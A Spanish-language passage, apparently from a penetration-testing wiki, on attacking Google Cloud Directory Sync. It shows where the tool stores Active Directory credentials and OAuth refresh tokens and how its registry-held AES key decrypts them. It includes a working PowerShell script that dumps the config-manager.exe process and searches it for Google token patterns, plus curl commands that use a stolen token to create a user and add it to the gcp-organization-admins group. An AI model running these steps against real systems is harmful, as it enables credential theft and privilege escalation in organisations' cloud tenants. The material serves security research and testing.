Esta es una herramienta que se puede usar para sincronizar tus usuarios y grupos de Active Directory con tu Workspace (y no al revés en el momento de escribir esto).
Es interesante porque es una herramienta que requerirá las credenciales de un superusuario de Workspace y un usuario privilegiado de AD. Por lo tanto, podría ser posible encontrarla dentro de un servidor de dominio que esté sincronizando usuarios de vez en cuando.
Para realizar un MitM al binario config-manager.exe solo agrega la siguiente línea en el archivo config.manager.vmoptions: -Dcom.sun.net.ssl.checkRevocation=false
Ten en cuenta que Winpeas es capaz de detectar GCDS, obtener información sobre la configuración y incluso las contraseñas y credenciales encriptadas.
También ten en cuenta que GCDS no sincronizará contraseñas de AD a Workspace. Si acaso, solo generará contraseñas aleatorias para los nuevos usuarios creados en Workspace, como puedes ver en la siguiente imagen:
GCDS - Tokens de Disco y Credenciales de AD
El binario config-manager.exe (el binario principal de GCDS con GUI) almacenará las credenciales de Active Directory configuradas, el token de actualización y el acceso por defecto en un archivo xml en la carpeta C:\Program Files\Google Cloud Directory Sync en un archivo llamado Untitled-1.xml por defecto. Aunque también podría guardarse en los Documentos del usuario o en cualquier otra carpeta.
Además, el registro HKCU\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui dentro de la clave open.recent contiene las rutas a todos los archivos de configuración abiertos recientemente (xmls). Así que es posible verificarlo para encontrarlos.
La información más interesante dentro del archivo sería:
Nota cómo el refreshtoken y la contraseña del usuario están encriptados usando AES CBC con una clave y un IV generados aleatoriamente almacenados en HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util (donde sea que la biblioteca Java prefs almacene las preferencias) en las claves de cadena /Encryption/Policy/V2.iv y /Encryption/Policy/V2.key almacenadas en base64.
Script de Powershell para desencriptar el refresh token y la contraseña
</details>
<div data-gb-custom-block data-tag="hint" data-style='info'>
Tenga en cuenta que es posible verificar esta información revisando el código java de **`DirSync.jar`** en **`C:\Program Files\Google Cloud Directory Sync`** buscando la cadena `exportkeys` (ya que ese es el parámetro cli que el binario `upgrade-config.exe` espera para volcar las claves).
</div>
En lugar de usar el script de powershell, también es posible usar el binario **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** con el parámetro `-exportKeys` y obtener la **Key** y **IV** del registro en hex y luego simplemente usar algún cyberchef con AES/CBC y esa clave e IV para descifrar la información.
### GCDS - Volcando tokens de la memoria
Al igual que con GCPW, es posible volcar la memoria del proceso del `config-manager.exe` (es el nombre del binario principal de GCDS con GUI) y podrás encontrar tokens de actualización y de acceso (si ya han sido generados).\
Supongo que también podrías encontrar las credenciales configuradas de AD.
<details>
<summary>Volcar procesos de config-manager.exe y buscar tokens</summary>
```powershell
# Define paths for Procdump and Strings utilities
$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"
$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"
$dumpFolder = "C:\Users\Public\dumps"
# Regular expressions for tokens
$tokenRegexes = @(
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
)
# Create a directory for the dumps if it doesn't exist
if (!(Test-Path $dumpFolder)) {
New-Item -Path $dumpFolder -ItemType Directory
}
# Get all Chrome process IDs
$chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id
# Dump each Chrome process
foreach ($processId in $chromeProcesses) {
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
}
# Extract strings and search for tokens in each dump
Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$uniqueMatches = @{}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
Write-Output ""
}
}
Remove-Item -Path $dumpFolder -Recurse -Force
GCDS - Generación de tokens de acceso a partir de tokens de actualización
Usando el token de actualización, es posible generar tokens de acceso utilizando este y el ID de cliente y el secreto de cliente especificados en el siguiente comando:
Tenga en cuenta que incluso teniendo un token de actualización, no es posible solicitar ningún alcance para el token de acceso, ya que solo puede solicitar los alcances admitidos por la aplicación donde está generando el token de acceso.
Además, el token de actualización no es válido en todas las aplicaciones.
Por defecto, GCSD no tendrá acceso como el usuario a todos los posibles alcances de OAuth, por lo que utilizando el siguiente script podemos encontrar los alcances que se pueden usar con el refresh_token para generar un access_token:
#### Crear un usuario y agregarlo al grupo `gcp-organization-admins` para intentar escalar en GCP
```bash
# Create new user
curl -X POST \
'https://admin.googleapis.com/admin/directory/v1/users' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"primaryEmail": "deleteme@domain.com",
"name": {
"givenName": "Delete",
"familyName": "Me"
},
"password": "P4ssw0rdStr0ng!",
"changePasswordAtNextLogin": false
}'
# Add to group
curl -X POST \
'https://admin.googleapis.com/admin/directory/v1/groups/gcp-organization-admins@domain.com/members' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"email": "deleteme@domain.com",
"role": "OWNER"
}'
# You could also change the password of a user for example
No es posible otorgar al nuevo usuario el rol de Super Admin porque el token de actualización no tiene suficientes alcances para otorgar los privilegios requeridos.
